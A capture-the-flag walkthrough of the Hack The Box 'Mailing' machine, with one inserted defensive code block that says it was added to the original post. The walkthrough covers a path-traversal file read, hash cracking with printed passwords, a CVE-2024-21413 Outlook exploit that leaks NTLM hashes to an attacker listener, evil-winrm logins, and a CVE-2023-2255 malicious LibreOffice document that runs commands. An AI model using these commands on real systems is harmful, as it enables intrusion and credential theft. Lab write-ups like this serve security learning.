Mailing – Hack The Box – @lautarovculic

User.txt

Let’s discover the open ports with nmap

				
					sudo nmap -sS -sV --min-rate 5000  -n -Pn -T4 -vv 10.10.11.14
				
			

Output

				
					PORT    STATE SERVICE       REASON          VERSION
25/tcp  open  smtp          syn-ack ttl 127 hMailServer smtpd
80/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
110/tcp open  pop3          syn-ack ttl 127 hMailServer pop3d
135/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
143/tcp open  imap          syn-ack ttl 127 hMailServer imapd
445/tcp open  microsoft-ds? syn-ack ttl 127
465/tcp open  ssl/smtp      syn-ack ttl 127 hMailServer smtpd
587/tcp open  smtp          syn-ack ttl 127 hMailServer smtpd
993/tcp open  ssl/imap      syn-ack ttl 127 hMailServer imapd
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
				
			

Let’s add the host to our /etc/hosts file

				
					echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
				
			

Now we will do some enumeration

I found an LFI in the web application's download function

				
					http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts
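
A defensive counterpart to the request above, added here and not taken from the original post or the target application: a containment check a download handler could apply to the `file` parameter under Windows path rules, reused to flag escaping requests in web logs. `BASE_DIR`, the function names and the IIS W3C sample lines are assumptions constructed for illustration.

```python
import ntpath
from urllib.parse import parse_qs, unquote

BASE_DIR = r"C:\wwwroot\downloads"  # assumed root; the page does not show it

def resolve_download(requested, base=BASE_DIR):
    """Return the normalized path if it stays under base, else None."""
    # ntpath applies Windows rules on any OS: '/' and '\' both separate, and a
    # rooted or drive-qualified name replaces base in join(). Lexical check
    # only: symlinks and junctions are not followed.
    if "\x00" in requested:
        return None
    base = ntpath.normcase(ntpath.normpath(base))
    full = ntpath.normcase(ntpath.normpath(ntpath.join(base, requested)))
    try:
        inside = ntpath.commonpath([base, full]) == base
    except ValueError:  # other drive, UNC share, or drive-relative name
        inside = False
    return full if inside and full != base else None

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .), bounded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_traversal(w3c_lines):
    """Return (line_no, decoded name) for download.php requests leaving BASE_DIR."""
    hits = []
    for n, line in enumerate(w3c_lines, 1):
        f = line.split()
        if line.startswith("#") or len(f) < 6 or not f[4].lower().endswith("/download.php"):
            continue
        for raw in parse_qs(f[5]).get("file", []):  # parse_qs decodes once
            name = decode_fully(raw)
            if resolve_download(name) is None:
                hits.append((n, name))
    return hits

# Constructed sample, IIS W3C default field order; documentation-range addresses.
SAMPLE = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip",
    "2024-05-05 04:01:10 192.0.2.10 GET /download.php file=instructions.pdf 80 - 198.51.100.7 curl - 200 0 0 12",
    "2024-05-05 04:02:31 192.0.2.10 GET /download.php file=../../windows/system32/drivers/etc/hosts 80 - 198.51.100.7 curl - 200 0 0 9",
    "2024-05-05 04:02:40 192.0.2.10 GET /download.php file=%252e%252e%255c%252e%252e%255cwindows%255cwin.ini 80 - 198.51.100.7 curl - 200 0 0 9",
]
```

`flag_traversal(SAMPLE)` reports lines 3 and 4; the same `resolve_download` check belongs in the handler itself, so that a rejected name is never opened.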
				
			

And we can get the .ini file of hMailServer

				
					[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
				
			

After cracking the AdministratorPassword hash, the password is

				
					homenetworkingadministrator
				
			

Let’s try logging in via Telnet

				
					telnet 10.10.11.14 110
				
			
				
					USER administrator@mailing.htb
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
LIST
+OK 0 messages (0 octets)
				
			

I remembered the famous Outlook CVE, so I tried this Python script

Then you can run

				
					sudo responder -I tun0
				
			
				
					python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\IP' --subject test123
				
			

Then we get the NTLM hash for the maya user!

				
					maya::MAILING:dac4fe0aec512cc...
				
			

Let’s crack it

				
					maya:m4y4ngs4ri
				
			

Now we can use evil-winrm to log in

				
					evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
				
			
				
					PS C:\Users\maya\Desktop> type user.txt
463996f3**********68581c
PS C:\Users\maya\Desktop>
				
			

And get the user.txt flag

Root.txt

Now it’s time for root

If we enumerate the installed programs

				
					reg query HKEY_LOCAL_MACHINE\SOFTWARE
				
			

We can see that LibreOffice is installed

And in C:\ there is an Important Documents folder

I dropped a file, and every minute it gets deleted… and executed?

Maybe it is CVE-2023-2255

Let’s clone this repo

				
					git clone https://github.com/elweth-sec/CVE-2023-2255 && cd CVE-2023-2255
				
			

After trying many methods to get a reverse shell, I took the dirty way: just type the root flag into another .txt file

				
					import subprocess
c = 'type C:\\Users\\localadmin\\Desktop\\root.txt >> C:\\Users\\maya\\Documents\\a.txt'
subprocess.run(c, shell=True)
				
			

We can call this script dirt.py and then execute this command:

				
					python3 CVE-2023-2255.py --cmd 'python C:\Users\maya\Documents\dirt.py' --output 'exploit.odt'
				
			

We have 2 files; we need to copy them to the /usr/share/evil-winrm/ folder for upload

				
					sudo cp dirt.py /usr/share/evil-winrm/dirt.py
				
			
				
					sudo cp exploit.odt /usr/share/evil-winrm/exploit.odt
				
			

Then in our Evil-WinRM session

				
					PS C:\Users\maya\Documents> upload dirt.py
				
			
				
					PS C:\Users\maya\Documents> cd C:\
PS C:\> cd "C:/Important Documents/"
PS C:\Important Documents> upload exploit.odt
				
			

If you can’t see a.txt in the Documents folder, just re-upload the .odt file or reset the machine and try again.

Wait a second and we will see the a.txt file

				
					PS C:\Important Documents> dir C:\Users\maya\Documents\


    Directory: C:\Users\maya\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/13/2024   4:49 PM                WindowsPowerShell
-a----          5/5/2024   4:22 AM             34 a.txt
-a----         4/11/2024   1:24 AM            807 mail.py
-a----         3/14/2024   4:30 PM            557 mail.vbs
-a----          5/5/2024   4:14 AM            594 dirt.py
				
			

Then

				
					PS C:\Important Documents> cd  C:\Users\maya\Documents\
PS C:\Users\maya\Documents> type a.txt
417aa94e*********10c153c430
PS C:\Users\maya\Documents>
				
			

We get the root.txt flag

I hope you found it useful (:
